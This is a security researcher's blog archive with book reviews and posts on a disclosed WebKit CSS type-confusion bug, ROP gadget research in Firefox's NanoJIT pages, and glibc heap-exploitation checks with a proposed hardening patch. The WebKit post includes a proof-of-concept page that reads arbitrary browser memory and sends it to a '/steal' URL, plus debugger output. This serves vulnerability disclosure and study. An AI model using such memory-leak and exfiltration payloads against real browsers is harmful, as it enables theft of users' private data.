Tuesday, June 26, 2012

Changing Blogs

After 6 years of blogging here at EM_386 I have decided to stop posting. Fortunately it is only so I can begin writing on the new LeafSR blog. I will be porting over a few of the better EM_386 posts as time permits but you can expect new content going forward.

In the past 6 years I've only logged 50 posts here but many of them still see dozens of page views a day. That is especially true of posts such as ELF Relocations Names and Symbols, WebKit CSS Type Confusion and GlibC 2.11 Stops the House of Mind. To this day I still get emails from people who read and appreciate the older posts. For that reason I will be leaving all the old content here unmodified. Hopefully someone will find it useful in the future.

Thanks again for reading and see you at the new blog!

Thursday, April 12, 2012

Practical Malware Analysis Review

I recently finished my review copy of 'Practical Malware Analysis'. I enjoyed this book for a few reasons. Each chapter concludes with some simple questions/labs to test your knowledge and give you a chance at some hands-on experience related to the content you just read.

Although the title leads you to believe it's strictly a malware analysis book, there's a lot of good content for any new reverse engineer. This is especially true for the static analysis sections. There are also two chapters in this book that I think help it really stand out among similar books: 'Chapter 20: C++ Analysis' and 'Chapter 21: 64-bit Malware'. None of the information in these chapters is new research but as a beginner you would have to sort through dozens of research papers to find the same content. They are a great introduction to both topics.

If you analyze malware for a living or are just looking to understand how software reverse engineering works then you won't regret buying this book.

(I originally intended to post this over a month ago. Better late than never!)

Tuesday, November 22, 2011

Book reviews and more...

Recently I was sent review copies of three books from No Starch Press and Addison Wesley. This occasionally happens but I never blog reviews. I'm going to change that...


'A Bug Hunter's Diary'
This book by Tobias Klein was the first book I reviewed. I, like many others in the security community, received a review copy a few weeks back and I just finished it up. I was aware of Tobias' public security advisories and tools long before this book was published, so I was eager to read it from the start. The author takes the reader through a tour of bug hunting from start to finish. This includes detailed source and binary analysis of the bugs he has found, the process for triggering them and finally gaining control of EIP. While gaining EIP is great, in 2011 it's just the first step to reliable code execution, but exploitation is not the focus of the book. He does not provide full exploits due to the laws in his home country (he makes this point several times), which is a shame but understandable. Each chapter focuses on a different application, ranging from media players (VLC) to kernel drivers, and on different operating system platforms including iOS, Solaris, Linux and Windows. This sounds like a ton of information to take in but the book is actually quite small and readable. As usual No Starch does a good job of adding side-bar style information and good illustrations to help the reader understand complex technical concepts. There are also three appendices with helpful information for bug hunting, debugging tips and exploit mitigations. I even got a mention in appendix C for a generic RELRO technique I published a number of years ago. I definitely recommend this book for anyone who is just starting out in this field and is interested to know exactly what the process of finding software vulnerabilities is like.


'The CERT Oracle Secure Coding Standard For Java'
I would normally never review a book like this because #1 it's a massive technical reference book and #2 I'm not a huge fan of Java. But I saw Robert Seacord was one of the authors and changed my mind. Nothing against the other authors, their names just weren't known to me. To be honest I did not read the entire thing. It's a reference book in my opinion and not meant to be read cover to cover. In fact it reads like the cert.org standards websites, and that's because it's the same text. All of the CERT standards are well researched and tested. I recommend them to developers all the time and this one is no exception. If you are a Java developer then you should definitely have the standards website bookmarked. If you're looking for some light weekend reading then this probably isn't the book for you.


'The Tangled Web'
Last, but certainly not least, Michal Zalewski's newest book is about web security. @lcamtuf is a well known person in the security community. His published work includes tools that range from low level debugging to automated XSS detection. If you work in computer security and you don't know who he is then you don't really work in computer security. My expectations were high for this book for a reason and it doesn't disappoint. The first chapter contains a good overview of why security is difficult and how the web is no exception. There's also a good browser history lesson mixed in there. I do a lot of research that involves reading browser source code and reversing particular browser components and I am always surprised by quirks I find in each different implementation. It is these subtle differences that make XSS work on one browser and not another. There's a huge divide between a web pentester who knows how browsers work and one who just pastes JavaScript into every GET parameter. The Tangled Web captures a lot of these nuances between CSS and JavaScript implementations. Each chapter concludes with a great cheat sheet. Overall, I enjoyed the book. If you test or build web apps then you will too.

Sunday, August 07, 2011

Attacking Client Side JIT Compilers

This blog is far from dead! I have been involved in some very interesting research these past few months. Yan Ivnitskiy and I presented at the BlackHat conference in Las Vegas this August. The title of our talk was Attacking Client Side JIT Compilers. We researched everything from incorrect JIT code emission to reusing predictable JIT code sequences.

We have published our slides and our research paper on the Matasano research website. You can find it all here. Feel free to email either Yan or me if you have any questions about the content.

Wednesday, December 15, 2010

WebKit CSS Type Confusion

Here is an interesting WebKit vulnerability I came across and reported to Google, Apple and the WebKit.org developers.

Description: WebKit CSS Parser Type Confusion
Software Affected: Chrome 7/8, Safari 5.0.3, Epiphany 2.30.2, WebKit-r72146 (others untested)
Severity: Medium

The severity of the vulnerability was marked Medium by the Chrome developers because the bug can only result in an information leak. I don't have a problem with that but I have some more thoughts on it at the end of the post. But first the technical details.

The WebKit CSS parser internally stores a CSSParserValueList which contains a vector of CSSParserValue structures. These structures are used to hold the contents of parsed CSS attribute values such as integers, floating point numbers or strings. Here is what a CSSParserValue looks like.
struct CSSParserValue {
    int id;
    bool isInt;
    union {
        double fValue;
        int iValue;
        CSSParserString string;
        CSSParserFunction* function;
    };
    enum {
        Operator = 0x100000,
        Function = 0x100001,
        Q_EMS    = 0x100002
    };
    int unit;

    PassRefPtr<CSSValue> createCSSValue();
};
When WebKit has successfully parsed a CSS value it will set the unit variable to a constant indicating what type it should be interpreted as. So depending on the value of unit a different member of the union will be used to address the CSS value later in the code. If the value was a floating point or an integer the fValue or iValue will store that number. If the value is a string a special CSSParserString structure is used to copy the string before placing it into the DOM as element.style.src.

The vulnerability exists in a function responsible for parsing the location of a font face source. So we find ourselves in WebCore::CSSParser::parseFontFaceSrc() found in CSSParser.cpp of the WebKit source. I have clipped certain parts of the function for brevity.
bool CSSParser::parseFontFaceSrc()
{
    ...
[3629]        } else if (val->unit == CSSParserValue::Function) {
[3630]            // There are two allowed functions: local() and format().
[3631]           CSSParserValueList* args = val->function->args.get();
[3632]            if (args && args->size() == 1) {
[3633]                if (equalIgnoringCase(val->function->name, "local(") && !expectComma) {
[3634]                    expectComma = true;
[3635]                    allowFormat = false;
[3636]                    CSSParserValue* a = args->current();
[3637]                    uriValue.clear();
[3638]                    parsedValue = CSSFontFaceSrcValue::createLocal(a->string);
At this point in the code the CSS parser has already extracted the value of the font face source and now the code is trying to determine whether the font value is local or not. If the source of the font is wrapped in a local() URL then we hit the code above. The problem here is that the CSSParserValue's unit variable is never checked on line 3633. The code assumes the value previously parsed is a string and the CSSParserString structure within the union has already been initialized by a previous caller. Now on line 3636 a CSSParserValue pointer, a, is assigned to the value and on line 3638 the a->string operator is called on it. Here is what that structure looks like:
struct CSSParserString {
    UChar* characters;
    int length;

    void lower();

    operator String() const { return String(characters, length); }
    operator AtomicString() const { return AtomicString(characters, length); }
};
So when a->string is called in line 3638 WebKit's internal string functions will be called to create a string with a source pointer of a->string.characters and a length of a->string.length so it can be added to the DOM by CSSParser::addProperty(). This code assumes the value is a string but this CSSParserValue may not have been initialized as one. Let's take a second look at the union in the CSSParserValue structure:
    union {
        double fValue;               // 64 bits
        int iValue;                  // 32 bits
        CSSParserString string;      // sizeof(CSSParserString)
        CSSParserFunction* function; // 32 bits
    };
The double fValue will occupy 64 bits in memory on a 32-bit x86 platform [1]. This means in memory at runtime the first dword of fValue overlaps with string.characters and the second with string.length. If we can supply a specific floating point value as the source location of this font face we can trigger an information leak when WebKit interprets it as a CSSParserString structure and attempts to make a copy of the string. I should also note that the string creation uses StringImpl::create which copies the string using memcpy, so we don't have to worry about our stolen data containing NULLs. Exploiting this bug is very easy:
      <html>
      <script>
        function read_memory() {
            ele = document.getElementById('1');
            document.location = "http://localhost:4567/steal?s=" + encodeURI(ele.style.src);
        }
      </script>
      <h1 id=1 style="src: local(0.(your floating point here) );" />
      <button onClick='read_memory()'>Click Me</button>
      </html>
That floating point number will occupy the first 64 bits of the union. The double fValue when holding this value will look like this in memory: 0xbf95d38b 0x000001d5, which means (a->string.characters = 0xbf95d38b) and (a->string.length = 0x000001d5). Through our floating point number we can control the exact address and length of an arbitrary read whose contents will then be added to the DOM as the source of the font face. In short, an attacker can steal as much content as he wants from anywhere in your browser's virtual memory. Here is the CSSParserValue structure in memory just after the assignment of the CSSParserValue pointer, a, when running the exploit.
(gdb) print *a
$167 = {id = 0, isInt = false, {fValue = 9.9680408499984197e-312, iValue = -1080700021, 
string = {characters = 0xbf95d38b, length = 469}, function = 0xbf95d38b}, unit = 1}

(gdb) x/8x a
0xb26734f0:    0x00000000    0x00000100    0xbf95d38b    0x000001d5
0xb2673500:    0x00000001    0x00000000    0x00000000    0x00000000
Here is where the stack is mapped in my browser:
bf93a000-bf96e000 rw-p 00000000 00:00 0          [stack]
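The overlap between fValue and the string fields can be reproduced outside the browser. The following is a minimal Python sketch, not part of the original exploit: it packs the two dwords from the gdb session into a little-endian double and back, and checks that the resulting pointer falls inside the stack mapping shown above. The helper names are my own and purely illustrative.

```python
import struct

def dwords_to_double(low, high):
    """Reinterpret two little-endian 32-bit dwords as one IEEE 754 double."""
    return struct.unpack("<d", struct.pack("<II", low, high))[0]

def double_to_dwords(value):
    """Split a double into the (low, high) dwords that overlap
    string.characters and string.length on 32-bit little-endian x86."""
    return struct.unpack("<II", struct.pack("<d", value))

def in_mapping(addr, start, end):
    """True if addr lies inside the half-open mapping [start, end)."""
    return start <= addr < end

# Values taken from the gdb session above.
characters, length = 0xbf95d38b, 0x000001d5

f_value = dwords_to_double(characters, length)
print("fValue as the parser sees it:", repr(f_value))
print("dwords recovered from fValue:", [hex(d) for d in double_to_dwords(f_value)])

# Stack mapping from the process maps line above.
STACK_START, STACK_END = 0xbf93a000, 0xbf96e000
print("pointer lands in [stack]:", in_mapping(characters, STACK_START, STACK_END))
```

Going the other way (choosing an address and length first, then deriving the double to place in the CSS) is the same pack/unpack pair in reverse order.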
I did some testing of this bug using Gnome's Epiphany browser. It also uses WebKit and is a little easier to debug than Chrome. Here is a screenshot of the exploit using JavaScript to read 469 bytes from the stack and displaying it in an alert box:


OK so it's an info leak. No big deal... right? Info leaks are becoming more valuable as memory corruption mitigations such as ASLR (Address Space Layout Randomization) become more widely adopted by software vendors. An info leak essentially makes ASLR worthless because an attacker can use it to find out where your browser's heap is mapped or where a specific DLL with ROP gadgets resides in memory. Normally an info leak might come in the form of exposing a single address from an object or reading a few bytes off the end of an object, which exposes vftable addresses. These types of leaks also make exploitation easier but usually don't expose any of the web content displayed by the browser. In the case of this bug we have to specify what address to read from. If an unmapped address is used or the read walks off the end of a page then we risk crashing the process. The attacker doesn't have to worry about this on platforms without ASLR.

Almost as important as reliable code execution is the data itself: the more sensitive content we push into web browsers, the more valuable a highly reliable and controllable info leak becomes. You could theoretically use it to read an open document or webmail or any other sensitive content the user's browser has open at the time or has cached in memory from a previous site.

Anyways, hope you enjoyed the post, it was a fun vulnerability to analyze. Thanks to Google, Apple and WebKit for responding so quickly [2], even to a Medium! Now go and update your browser.

[1] http://en.wikipedia.org/wiki/Double_precision_floating-point_format
[2] http://trac.webkit.org/changeset/72685/trunk/WebCore/css/CSSParser.cpp

Wednesday, June 23, 2010

It's 2010 and your browser has an assembler

So it's 2010 and your browser has an assembler. How the hell did that happen? Simple: performance. Your browser probably includes at least one JIT (Just In Time) compiler: one for JavaScript (Chrome, Firefox) and possibly others for plugins like Adobe Flash Player. If you're using Firefox with the Adobe Flash Player plugin then it has two instances of the same JIT, called NanoJIT. Firefox uses SpiderMonkey/TraceMonkey as its front end to NanoJIT and Flash uses Tamarin as its front end. TraceMonkey watches for JavaScript code that could benefit from being compiled into native code. It translates JavaScript into LIR (Low-Level Intermediate Representation) instructions which NanoJIT turns into native x86, x86_64, Sparc, PPC or ARM instructions. This is why your browser has an assembler in 2010.

Surely native code generation in your browser can't be bad for security? Dionysus Blazakis figured out a clever exploitation technique [1] where he used ActionScript byte code to JIT-spray a browser. The native code generated by Tamarin/NanoJIT was easy to influence via the ActionScript under his control. After reading Dion's paper last year I wanted to write my own JIT spray and research other JITs. I started with NanoJIT in Firefox. Along the way I noticed some interesting things that I thought would make a good blog post. My research isn't done but this writeup has been for a while now and there is no sense in letting it collect dust in a directory any longer.

So first the basics. Pages for NanoJIT on Windows are allocated using the VirtualAlloc function and have RWX permissions. VirtualAlloc is not subject to ASLR (Address Space Layout Randomization) so it does not return randomized page locations. As a result, an attacker's JavaScript can cause many allocations of contiguous RWX page mappings. These allocations are not at the 4 KB page size granularity of 32-bit x86, but their sizes are static: the next JIT-page allocation should be at 0x10000 bytes (64 KB) past the previous one. Dion also notes this in his paper. This is bad, but not the end of the world.

Here's some output from a WinDbg plugin I wrote (JitFind) that tracks the pages NanoJIT is using for compiled JavaScript. There are some holes in the range but as you can clearly see there are multiple contiguous allocations.

[ JitFind ] (25) 0x03510000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (26) 0x03520000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (27) 0x03530000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (28) 0x03540000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (29) 0x03550000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (30) 0x03560000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (31) 0x03570000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (32) 0x03580000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (33) 0x03590000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (34) 0x035a0000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
(..)
[ JitFind ] (35) 0x039d0000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (36) 0x039e0000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (37) 0x039f0000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
(..)
[ JitFind ] (38) 0x03b00000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (39) 0x03b10000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (40) 0x03b20000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (41) 0x03b30000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
(..)
[ JitFind ] (42) 0x03c40000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
(..)
[ JitFind ] (43) 0x03c60000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (44) 0x03c70000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (45) 0x03c80000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
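To make the contiguity in that output concrete, here is a small Python sketch (not part of JitFind) that groups the base addresses listed above into runs spaced exactly 0x10000 bytes apart. The function name and the hard-coded address list are mine, copied from the output for illustration only.

```python
JIT_ALLOC_STRIDE = 0x10000  # spacing between consecutive JIT allocations

def contiguous_runs(addresses, stride=JIT_ALLOC_STRIDE):
    """Group base addresses into runs where each entry is exactly
    `stride` bytes past the previous one."""
    runs = []
    for addr in sorted(addresses):
        if runs and addr - runs[-1][-1] == stride:
            runs[-1].append(addr)      # extends the current run
        else:
            runs.append([addr])        # a hole: start a new run
    return runs

# Base addresses (25) through (45) from the JitFind output above.
allocations = (
    [0x03510000 + i * JIT_ALLOC_STRIDE for i in range(10)]  # 0x03510000 .. 0x035a0000
    + [0x039d0000, 0x039e0000, 0x039f0000]
    + [0x03b00000, 0x03b10000, 0x03b20000, 0x03b30000]
    + [0x03c40000]
    + [0x03c60000, 0x03c70000, 0x03c80000]
)

for run in contiguous_runs(allocations):
    print(f"{run[0]:#010x} .. {run[-1]:#010x}  ({len(run)} allocations)")
```

The longer a run, the more tolerant a guessed address inside it is to being off by a few allocations.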

NanoJIT internally uses a CodeList structure to track JIT pages. Within each page is a pointer to the previous page, the next page and the offset where the executable code can be found. In the case of NanoJIT, JitFind works by monitoring for calls to VMPI_setPageProtection, nanojit::Assembler::endAssembly, and nanojit::CodeAlloc::reset and then walks the list for pages it might have missed. JitFind can also track pages in any process marked executable with VirtualProtect, and I'm in the process of adding support for other JITs as well. Writing JitFind was a large part of this research effort and if I accomplished nothing else, it's a pretty nice plugin.

Mozilla had already started to tackle part of the problem a while back [2]. If you couldn't read that whole Bugzilla thread then I will sum it up for you. Mozilla's current Linux solution to the RWX pages problem is to make a mirror page. One is W and one is X, where writes to one are translated to the other. There is talk of porting the patch to Win32 and OSX as well. I don't believe this is the best solution as its goal is to make an SELinux policy happy (no WX pages) and it ignores the Windows user base, which has a bigger problem (contiguous RWX page allocations at non-randomized locations). At best it's a partial solution. The contiguous page issue does not affect Linux because NanoJIT will use the mmap function to allocate pages and mmap is subject to ASLR, which means it allocates pages at a random location.

So it's quite obvious that if an attacker can get his code into those RWX page regions, or has a write4 anywhere condition via an overflow or dangling pointer, he stands a pretty good chance of guessing where they are because of VirtualAlloc. But there's another twist to this issue which, when combined with the contiguous RWX pages, makes for an interesting exploitation scenario.

NanoJIT writes code backwards from the end of the page. This is why code offsets from the beginning of the page appear to change. One of the important things to know is that NanoJIT also assembles a large jump table and other static code inline with JIT'd code. This static code sets up stack frames and performs other small work for the transition to/from JIT'd code. This means there are static instructions at known offsets repeated across contiguous RWX pages. I started thinking, might an attacker be able to write JavaScript that forces the allocation of many RWX JIT pages, trigger his vulnerability and then transfer execution to [ JIT_PAGE + PAGE_SIZE - ROP Gadget ] to get arbitrary code execution? If you're not familiar with ROP, it stands for 'Return Oriented Programming' [3] [4]. Now of course it's not as easy as that in the real world. We need to find usable ROP gadgets within that static code. This is done by analyzing a large set of JIT pages, determining if any RET instructions can be found at predictable locations and then finding usable ROP gadgets preceding them. I attempted this using a combination of JitFind to dump the raw JIT RWX page contents as they were created and a simple Ruby script that analyzed each page dump for consistent RET instructions and used rbdasm to dump those potential ROP gadgets.
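The core of that scan is simple enough to sketch. What follows is a minimal Python approximation, not the original Ruby script: it records every offset holding a 0xC3 byte in each page dump and keeps the offsets shared by at least a minimum number of pages. It assumes a raw byte match is good enough for a first pass. A 0xC3 byte can also sit in the middle of another instruction, so real candidates still need to go through a disassembler. The page names and contents below are synthetic.

```python
from collections import defaultdict

RET_OPCODE = 0xC3  # x86 near RET

def ret_offsets(page):
    """Return the set of offsets in a raw page dump that hold a 0xC3 byte."""
    return {offset for offset, byte in enumerate(page) if byte == RET_OPCODE}

def common_rets(pages, min_pages):
    """Map offset -> sorted page names that have 0xC3 at that offset,
    keeping only offsets shared by at least `min_pages` pages."""
    seen = defaultdict(list)
    for name, data in pages.items():
        for offset in ret_offsets(data):
            seen[offset].append(name)
    return {off: sorted(names) for off, names in seen.items()
            if len(names) >= min_pages}

# Synthetic 8-byte "pages" standing in for raw JIT page dumps.
pages = {
    "page_a.bin": bytes([0x90, 0x5D, 0xC3, 0x90, 0x90, 0x90, 0x90, 0xC3]),
    "page_b.bin": bytes([0x90, 0x5D, 0xC3, 0x90, 0xC3, 0x90, 0x90, 0x90]),
    "page_c.bin": bytes([0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xC3]),
}

for offset, names in sorted(common_rets(pages, min_pages=2).items()):
    print(f"RET @ {offset:#x} ({len(names)})")
    for name in names:
        print(f"|_ {name}")
```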

First we need to write some JavaScript that will force Firefox into allocating a bunch of contiguous pages that contain the same static code before we can realistically look for ROP gadgets. Resource intensive JavaScript will be required; that's why the JIT was created in the first place. Remember we are only interested in the static code produced by the JIT, not influencing the instructions like Dion did. I thought about this problem for a while. Some simple math problems wouldn't do the trick so I turned to graphics. A Google search for JavaScript ray tracers turned up exactly what I needed. I borrowed a ray tracer written in JavaScript from the internet and after some minor tweaking NanoJIT started to sing. My tweaks mainly consisted of instructing the ray tracer to draw high quality, large resolution images. With this I could now force many (40 to 50) contiguous RWX allocations through a single instance of the ray tracer. There are a few holes in the address space here, presumably due to the system heap allocator stealing them, but I haven't looked into that. This minor detail obviously hurts the reliability of the technique and I need to research it further.

Here's the output of my gogo-gadget-finder Ruby script analyzing 224 pages created by five simultaneous instances of the ray tracer in a single Firefox instance. One issue here is that as pages are no longer needed they are free'd and sometimes allocated again by another ray tracer instance. I filtered these duplicates out and while it lowered the overall number of pages I was scanning it is a more accurate reflection of the process image during runtime. This behavior appears to be different than that of Tamarin and Dion's experience with Flash, where pages were not immediately unmapped.

* As Dion points out in the comments, he kept the JIT pages mapped using a reference to functions on them. I suspect you can do something similar in Javascript but I have not looked into it.
$ ruby gogo-gadget-finder.rb -m 5
RET @ 0xffd7 (10)
|_ raw_page_2150000-1947765593.bin
|_ raw_page_23d0000-2279729936.bin
|_ raw_page_23f0000-50251687.bin
|_ raw_page_2750000-2059690635.bin
|_ raw_page_29f0000-3894631435.bin
|_ raw_page_2d10000-2295099192.bin
|_ raw_page_2e60000-1268413647.bin
|_ raw_page_2e80000-1700891559.bin
|_ raw_page_3560000-1344858230.bin
|_ raw_page_36c0000-1565064345.bin
RET @ 0xe437 (5)
|_ raw_page_2150000-1947765593.bin
|_ raw_page_23f0000-50251687.bin
|_ raw_page_2750000-2059690635.bin
|_ raw_page_2e60000-1268413647.bin
|_ raw_page_35f0000-1316993084.bin
RET @ 0xfb09 (5)
|_ raw_page_1eb0000-1004861587.bin
|_ raw_page_2e70000-2748893595.bin
|_ raw_page_35d0000-2041835722.bin
|_ raw_page_3620000-3921514024.bin
|_ raw_page_3620000-467968694.bin
RET @ 0xffef (6)
|_ raw_page_1ea0000-181584545.bin
|_ raw_page_29a0000-141065932.bin
|_ raw_page_29b0000-3609538306.bin
|_ raw_page_2e60000-1313636049.bin
|_ raw_page_3580000-330610872.bin
|_ raw_page_35c0000-420260428.bin

That's not a lot of repeated RET instructions, and the ones that do match are generated by the NanoJIT assembler and not in the middle of another instruction stream. Each of these repeated RETs is preceded by a large jump table and then a 'pop ebp' instruction. What's worse is that the repeated RETs that do exist are not in pages that border one another. So while our ray tracer is generating the right number of pages, we are not getting consistent reusable gadgets across them.

So where does this leave us? Using ROP gadgets ending in RET instructions is going to be difficult to pull off. We didn't even find a stack pivot gadget to kick off the process. More research is needed.

Next Steps:

It may be possible to chain together sequences of 'pop %reg; jmp %reg;' to get code execution [5]. These too of course must meet the same requirements as our RET based ROP gadgets. They must be at static locations across many of the JIT pages. More fine grained control over the page creation is also desirable. The ray tracer proved useful for generating pages to search for ROP gadgets but further research of NanoJIT is needed to know whether we can influence a specific jump table or other static code construct. I only looked at NanoJIT's generation of 32-bit x86 code, and it supports other architectures too! Of course researching similar issues on other JITs is also on the radar.

Conclusion:

This is not a specific flaw in Firefox or NanoJIT. If anything it's an architectural oversight that should be further researched and hardened. The Mozilla team obviously cares about your security, which is evident from the SELinux thread from last year, but I think the problem is bigger on Windows and that's where the focus should be. This is not a trivial problem to solve on any platform. There are several factors at play including attacker influenced native code (Dion's attack), static code produced by NanoJIT, page permissions and page allocation specifics. VirtualAlloc makes the contiguous allocations unavoidable short of a VirtualAlloc wrapper or another randomized page allocation API. But keeping the page permissions correct is a good place to start. Of course if you have ever written a browser exploit you already know that there are much easier ways to get code execution: DLLs loaded at fixed addresses or heap spray, to name a few.

In the end this could theoretically result in an ASLR / DEP bypass for Firefox or any application that uses NanoJIT. The combination of repeated ROP gadgets in contiguous RWX page allocations makes it worth further study. And while that has not been proven here it was fun to research. Hope you enjoyed the post rant.

Note:

If you're a Firefox user and the idea of a JavaScript JIT makes you nervous, I have good news for you. You can disable it: https://wiki.mozilla.org/JavaScript:TraceMonkey#Playing_with_TraceMonkey


Tuesday, January 26, 2010

Glibc 2.11 stops the House of Mind

I was reading malloc.c from the Glibc 2.11 sources and I noticed a new check in the _int_free() function:
(malloc.c)
[4965]      bck = unsorted_chunks(av);
[4966]      fwd = bck->fd;
[4967]      if (__builtin_expect (fwd->bk != bck, 0))
[4968]        {
[4969]          errstr = "free(): corrupted unsorted chunks";
[4970]          goto errout;
[4971]        }
[4972]      p->fd = fwd;
[4973]      p->bk = bck;
[4974]      if (!in_smallbin_range(size))
[4975]        {
[4976]          p->fd_nextsize = NULL;
[4977]          p->bk_nextsize = NULL;
[4978]        }
[4979]      bck->fd = p;
[4980]      fwd->bk = p;
The check starting on line 4967 appears to have been added this past June. If you're not a security person then let me bring you up to date. Corrupting heap metadata traditionally allows you to execute arbitrary code. There are plenty of papers out there you can read to catch up on the subject, but there's one important fact you should be aware of. Most of these techniques no longer work within 1 to 2 years of publication. This is because the libc maintainers add small bits of code like the one above to save you from yourself. This particular patch checks that the first chunk in the arena's unsorted bin (fwd) points back at the bin itself (bck) before the freed chunk is linked in. If that check wasn't there (as is the case in glibc 2.10.1) and fwd was under attacker control, then the 'fwd->bk = p' line could be used to write the address of 'p' anywhere. If that didn't make sense to you then you're probably not a glibc maintainer or a neurotic security researcher. Consider yourself normal.
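For readers who find pointers easier to follow in a toy model, here is a rough Python sketch of the linking logic on lines 4965-4980. It is only a model under my own assumptions: chunks are plain objects, the class and function names are invented, and a "forged" chunk simply stands in for attacker-chosen memory whose bk field does not point back at the bin.

```python
class Chunk:
    """Toy stand-in for a malloc chunk with forward/back pointers."""
    def __init__(self, name):
        self.name = name
        self.fd = self
        self.bk = self

class CorruptedBin(Exception):
    pass

def link_unsorted(bin_head, p, check=True):
    """Link chunk p at the front of the unsorted bin (lines 4965-4980)."""
    bck = bin_head
    fwd = bck.fd
    if check and fwd.bk is not bck:          # the Glibc 2.11 check
        raise CorruptedBin("free(): corrupted unsorted chunks")
    p.fd = fwd
    p.bk = bck
    bck.fd = p
    fwd.bk = p   # with a forged fwd, this writes p where the attacker chose

# Healthy bin: the check passes and the list stays consistent.
head = Chunk("unsorted bin")
first = Chunk("first")
link_unsorted(head, first)

# Forged bin: bck->fd points at attacker-chosen "memory".
forged_head = Chunk("forged bin")
target = Chunk("target")
forged_head.fd = target
victim = Chunk("freed chunk")

link_unsorted(forged_head, victim, check=False)   # pre-2.11 behaviour
print("without check, target.bk ->", target.bk.name)

target.bk = target                                # reset the toy target
try:
    link_unsorted(forged_head, victim, check=True)
except CorruptedBin as err:
    print("with check:", err)
```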
If you're not familiar with the House of Mind then you should read 'The Malloc Maleficarum' written by Phantasmal Phantasmagoria:
"The method used involves tricking the wrapper invoked by free(),
called public_fREe(), into supplying the _int_free() internal
function with a designer controlled arena. This can subsequently
lead to an arbitrary memory overwrite. A call to free() actually
invokes a wrapper called public_fREe():"
I won't be covering these techniques in great detail here, but essentially, through a single call to free() on a chunk we can overflow, we can fool ptmalloc into using an arena structure we control. Certain members of the arena structure allow for arbitrary code execution to occur if the right conditions can be met. This technique currently still works in Ubuntu 9.10. The short story is: the new validation added to Glibc 2.11 stops the House of Mind technique.

... or does it?

The Malloc Maleficarum covers a second House of Mind technique which, unlike the first one, requires we place our arena at the location we want to overwrite. It still leverages a single call to free() and the trust the allocator has in the arena structure (it's also been covered in other papers, see the bottom of this post) but the difference in the second technique is that the arena's 'fastbinsY' container is used instead of 'bins'. This takes _int_free down a different, far less constrained code path. However the pointer exchange is not quite the same in this code path, so in order to gain code execution we need to place the start of our arena just before the data we want to overwrite. We can gain control of execution because we get a value of our choice written back to arena->fastbinsY[X]. It's not an ideal situation, but it should still work in Glibc 2.11.

(malloc.c)
[4879] p->fd = *fb;
[4880] *fb = p; // This is how we get an arbitrary 4 byte overwrite

Perhaps more important than what does work is what will fix it. Because this technique is somewhat unreliable it may not make sense to further burden the allocator with yet another integrity check. But we should explore our options. We could try to stop all arena based attacks by inspecting where the arena itself resides, but this is a rather clumsy way of approaching the problem, and with ASLR enabled, it probably won't be too successful. A better solution might be to first check whether the chunk 'fb' points to contains a valid forward pointer to the next chunk in its list. But fastbin chunks are only singly linked, thus a subsequent check of the next chunk's bk pointer would not work. The reason they are not doubly linked is that they are never removed from these lists and consolidated with other free chunks, which of course helps performance for smaller, frequently allocated/free'd chunks. Another potential fix might be to check the chunk size of the current fastbin entry (the one that will be overwritten). Because the arena has to be placed near/on the region of memory we want to overwrite, the attacker most likely cannot control what the size is. This partially validates that the location 1) is valid (it's mapped) and 2) has a size between 0 and MAX_FASTBIN. It might look something like this:

--- malloc.c 2009-10-30 13:17:08.000000000 -0400
+++ malloc-a.c 2010-01-20 08:28:36.000000000 -0500
@@ -4852,6 +4852,12 @@
set_fastchunks(av);
fb = &fastbin (av, fastbin_index(size));
+ if (*fb != NULL && chunksize(*fb) > get_max_fast())
+ {
+ errstr = "invalid fastbin entry (free)";
+ goto errout;
+ }
+
#ifdef ATOMIC_FASTBINS
mchunkptr fd;
mchunkptr old = *fb;

This is of course not foolproof, but it's the best I've come up with in the short time I've thought about it. After a private conversation with a friend of mine, who coincidentally happens to be doing similar research, I'm not sure the integrity of the fastbin can be 100% verified in its current form.
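
For illustration, the idea behind the patch can be modelled outside of glibc. This is only a sketch: the chunk structure is a cut-down stand-in, MODEL_MAX_FAST is an assumed constant standing in for get_max_fast(), and checked_fastbin_push is a hypothetical name.

```c
#include <stddef.h>

#define MODEL_MAX_FAST  64            /* assumed stand-in for get_max_fast() */
#define SIZE_FLAG_BITS  ((size_t)0x7) /* low bits of 'size' carry flags */

/* Cut-down stand-in for glibc's malloc_chunk. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
};

/* Links p into the fastbin only if the current head, when there is one,
 * carries a plausible fastbin size. Returns 0 on success and -1 when the
 * entry looks corrupted. */
int checked_fastbin_push(struct chunk **fb, struct chunk *p)
{
    if (*fb != NULL && ((*fb)->size & ~SIZE_FLAG_BITS) > MODEL_MAX_FAST)
        return -1;   /* "invalid fastbin entry (free)" */

    p->fd = *fb;
    *fb = p;
    return 0;
}
```

The check dereferences whatever the slot currently holds, so in the real allocator an unmapped value would fault rather than reach the error path. It also does nothing against a target that happens to hold a small value at the size offset.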

